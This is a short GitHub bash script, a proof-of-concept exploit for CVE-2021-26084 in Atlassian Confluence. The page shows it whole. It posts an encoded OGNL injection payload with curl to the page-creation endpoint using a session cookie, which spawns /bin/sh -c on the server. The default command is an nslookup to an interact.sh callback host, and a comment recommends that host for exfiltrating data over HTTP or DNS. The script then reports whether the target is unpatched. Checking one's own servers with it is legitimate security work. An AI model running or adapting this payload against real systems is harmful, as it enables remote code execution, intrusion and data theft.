forked from GlennPegden2/cve-2021-26084-confluence
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcve-2021-26084-confluence.py
13 lines (11 loc) · 1.28 KB
/
cve-2021-26084-confluence.py
1
2
3
4
5
6
7
8
9
10
11
12
13
host='your.server.here.com'
spacekey=$'ST' # This can be any valid SpaceKey on your server.
sessionid='C88CREDCATEDREDACTEDREDACTEDF81C4' # The is held in the JSESSIONID cookie of any valid confluence session
uid=`date +%s`
cmd="nslookup $uid.c4qstll9481fv55eb7pgcr4h7iayyyyyn.interact.sh" # Command to run. Note execution is blind, the output will not be shown. Obviously interact.sh is great for exfilling over http/dns
payload=$"queryString=gdp\u0027%2b#{\u0022\u0022[\u0022class\u0022].forName(\u0022javax.script.ScriptEngineManager\u0022).newInstance().getEngineByName(\u0022js\u0022).eval(\u0022var x=new java.lang.ProcessBuilder;x.command([\u0027/bin/sh\u0027,\u0027-c\u0027,\u0027"$cmd"\u0027]);x.start();\u0022)}%2b\u0027"
len=${#payload}
echo "\n\nCurl output is\n"
curl -s -k -X $'POST' -H "Host: $host" -H $'User-Agent: cve-2021-26084-confluence poc' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H "Content-Length: $len" -b "JSESSIONID=$sessionid" --data-binary "$payload" "https://$host/confluence/pages/createpage-entervariables.action?spaceKey=$spacekey" | grep -i gdp
echo "\nOn an unpatched system, look for something like value=\"gdp{java.lang.UNIXProcess@2dbfa3f7=null}\" on a patched system you will see the encoded payload"
echo "cmd run was $cmd"